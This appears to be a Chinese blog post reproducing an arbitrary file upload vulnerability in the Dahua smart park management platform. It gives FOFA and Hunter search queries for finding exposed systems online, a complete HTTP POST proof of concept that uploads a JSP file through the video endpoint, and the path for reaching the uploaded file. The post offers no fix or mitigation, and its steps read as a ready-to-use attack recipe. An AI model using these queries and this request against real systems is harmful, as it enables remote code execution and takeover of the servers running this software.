Advertisement

大华智慧园区综合管理平台 video 任意文件上传漏洞

阅读量:

目录

漏洞描述

FOFA语法/鹰图语句

漏洞复现


漏洞描述

大华智慧园区综合管理平台视频接口存在文件上传漏洞,在该系统中攻击者可利用该漏洞随意上传至服务器内的任何文件,并从而掌握服务器的操作权限

FOFA语法/鹰图语句

复制代码
 fofa语句:"/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"

    
 鹰图语句:web.body="/WPMS/asset/lib/gridster/"

漏洞复现

1、在fofa里面搜:

登陆界面如下:

2、打开burp,把poc复制进去,然后发送

poc如下:

复制代码
 POST /publishing/publishing/material/file/video HTTP/1.1

    
 Host: your-ip:8009
    
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    
 Content-Length: 804
    
 Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
    
 Accept-Encoding: gzip, deflate
    
 Connection: close
    
  
    
 --dd8f988919484abab3816881c55272a7
    
 Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
    
  
    
 Test
    
 --dd8f988919484abab3816881c55272a7
    
 Content-Disposition: form-data; name="Submit"
    
  
    
 submit
    
 --dd8f988919484abab3816881c55272a7--

此操作将返回上传文件的名称。上传完成后,请访问以下路径:/publishingImg/VIDEO/230812152005170200.jsp

4、然后去访问

全部评论 (0)

还没有任何评论哟~